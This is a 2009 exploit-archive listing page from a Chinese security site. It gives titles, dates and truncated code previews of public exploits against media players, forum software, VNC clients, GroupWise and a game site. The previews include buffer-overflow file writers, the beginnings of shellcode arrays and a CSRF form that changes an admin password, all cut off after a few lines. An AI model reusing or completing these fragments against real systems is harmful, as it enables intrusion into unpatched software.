首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit
  日期:2009-02-06 11:50:10 点击:42 评论:0
!-- txtBB = 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit By cOndemned Greetz: ZaBeaTy, sid.psycho, Alfons Luja, vCore, irk4z str0ke ;) Exploitation: 1. Create an account 2. Go to http://[host]/[txtbb10RC3_path]/index.php?type=account 3. P
FeedMon 2.7.0.0 outline Tag Buffer Overflow Exploit PoC
  日期:2009-02-06 11:49:19 点击:34 评论:0
#!usr/bin/perl -w ################################################################################ # Reference: # http://security.bkis.vn/?p=329 # http://www.securityfocus.com/bid/33630/info # # Tested on Windows Server 2003 with FeedMon 2.7.0.0. Fee
dBpowerAMP Audio Player 2 .PLS File Local Buffer Overflow Exploit
  日期:2009-02-06 11:47:48 点击:33 评论:0
/* * simo36.c * CODED By SimO-s0fT (Morrocco--marrakesh city) * Home : Exploiter-ma.com * e-mail: maroc-anti-connexion[at]hotmail.com[dot]com *greetz : Stack Djekmani4ever alphanix all friends * dBpowerAMP Audio Player local buffer overflow exploit *
UltraVNC/TightVNC Multiple VNC Clients Multiple Integer Overflow PoC
  日期:2009-02-05 14:03:09 点击:83 评论:0
#!/usr/bin/env python # POC: Multiple VNC Clients Multiple Integer Overflow Vulnerabilities(UltraVNC and TightVNC), BID 33568 #Author: Andres Lopez Luksenberg polakocai@gmail.com (Visit: http://208.66.16.113/~andres/) # import socket serversocket = s
Nokia Multimedia Player version 1.1 .m3u Heap Overflow PoC exploit
  日期:2009-02-05 10:11:42 点击:44 评论:0
# Nokia Multimedia Player version 1.1 .m3u Heap Overflow PoC exploit# by 0in aka zer0in from Dark-Coders Group! [0in.email[at]gmail.com] / 0in[at]dark-coders.pl]# http://www.Dark-Coders.pl# Special thx to doctor ( for together analyse this shi*) and
Euphonics Audio Player v1.0 (.pls) Local BOF POC
  日期:2009-02-05 10:09:25 点击:19 评论:0
#!/usr/bin/perl -w #By DarkB0X #HomePage : http://NullArea.Net #contact : darkb0x97@googlemail.com my $file=dark.pls; $accessviolation = x41x41x41x41 x 408973 ; open(my $FILE, $file) or die Cannot open $file: $!; print $FILE $accessviolation ; c
MetaBBS version 0.11 change administrative password exploit
  日期:2009-02-05 10:07:10 点击:37 评论:0
Metabbs 0.112008-08-06 19:56form method=post action=http://test.com/metabbs/admin/settings/?dldtlabel for=settings_admin_passwordAdmin password/label/dtddinput id=settings_admin_password size=20 name=settings[admin_password] value= type=password //d
StreamDown version 6.4.3 local buffer overflow proof of concept exploit
  日期:2009-02-05 10:06:04 点击:19 评论:0
#!perl## StreamDown v6.4.3 Local Buffer Overflow Exploit (0day)# -------------------------------------------------------# Research Exploit [Todor Donev :: todor.donev@gmail.com]# -------------------------------------------------------# Shareware sof
LCPlayer proof of concept denial of service exploit
  日期:2009-02-05 10:04:54 点击:25 评论:0
#!/usr/bin/perl -w#By DarkB0X#HomePage : http://NullArea.Net#contact : darkb0x97@googlemail.com#after loading the file click on it in the program#entry point will change and the app will crashmy $file = dark.qt ;my $poc=http://.A x 0265487 ;open(b0x
Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (vista)
  日期:2009-02-05 10:01:26 点击:38 评论:0
#!/usr/bin/perl ############################################# # # Amaya 11 bdo tag stack overflow # # author: Rob Carter (cartrel@hotmail.com) # # targets: windows vista sp1 # # modified the alpha-numeric shell-code # from metasploit since the first
Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (winxp)
  日期:2009-02-05 10:00:44 点击:30 评论:0
#!/usr/bin/perl ##################################################### # # Amaya 11 bdo tag remote stack overflow exploit # # author: Rob Carter (cartrel@hotmail.com) # # affects: winxp sp0-3 # # this vulnerability only allows hex bytes # between 0x01
Free Download Manager 2.5/3.0 (Authorization) Stack BOF PoC
  日期:2009-02-05 09:59:55 点击:50 评论:0
#!usr/bin/perl -w ####################################################################################### # Stack-based buffer overflow in Remote Control Server in Free Download Manager # (FDM) 2.5 Build 758 and 3.0 Build 844 allows remote attackers
Novell GroupWise <= 8.0 Malformed RCPT command Off-by-one Exploit
  日期:2009-02-05 09:58:56 点击:51 评论:0
#!usr/bin/perl -w ####################################################################################### ###############################QUICK AND DIRTY EXPLOIT################################# ########################################################
YapBB <= 1.2 (forumID) Blind SQL Injection Exploit
  日期:2009-02-05 09:58:10 点击:17 评论:0
--+++======================================================+++-- --+++====== YapBB = 1.2 Blind SQL Injection Exploit ======+++-- --+++======================================================+++-- #!/usr/bin/perl use strict; use warnings; use IO::Socket
PHPbbBook 1.3 (bbcode.php l) Local File Inclusion Exploit
  日期:2009-02-04 20:56:06 点击:50 评论:0
#!/usr/bin/perl # ----------------------------------------------------------------------------- # INFORMATIONS # ----------------------------------------------------------------------------- # App = PHPbbBook 1.3 # Downl = http://phpbbbook.syssap.nl/
BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Overflow Exploit
  日期:2009-02-04 20:55:00 点击:20 评论:0
#!/usr/bin/python # # Title: BlazeVideo HDTV Player = 3.5 PLF Playlist File Remote Heap Overflow Exploit # # Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV # Player software, combining HDTV playback, FM receiving,
Euphonics Audio Player 1.0 (.pls) Local Buffer Overflow Exploit (xp/sp3)
  日期:2009-02-04 20:54:02 点击:20 评论:0
#include stdio.h #include windows.h #include string.h #define overflow 1324 #define NOP 0x90 #define pls Eye.pls int main (int argc,char **argv) { char winsp3[] = x7Bx46x86x7C; char buffer[overflow]; FILE *Player; unsigned char shellcode[] = x31
Euphonics Audio Player 1.0 (.pls) Universal Local Buffer Overflow Exploit
  日期:2009-02-04 20:53:25 点击:27 评论:0
#!/usr/bin/perl -w #----------------------------------------------------------------------------- # Author : Houssamix # Euphonics Audio Player v1.0 (.pls) Universal Local Buffer Overflow Exploit # Gr33tz to : str0ke , real-power.net , Legend-spy - s
BlazeVideo HDTV Player versions 3.5 and below remote heap overflow exploit
  日期:2009-02-04 10:43:06 点击:28 评论:0
#!/usr/bin/python## Title: BlazeVideo HDTV Player = 3.5 PLF Playlist File Remote Heap Overflow Exploit## Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV# Player software, combining HDTV playback, FM receiving, vide
Online Game Script cross site request forgery exploit
  日期:2009-02-04 10:42:35 点击:28 评论:0
__________________________________________________________________________________|Site [Online Game]: http://gladiatus.net|| Author: S1B3RK4N|| Email: s1b3rk4n[at]gmail[dot]com||______________________________________________________________________
共637页/12733条记录 首页 上一页 [476] [477] [478] 479 [480] [481] [482] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved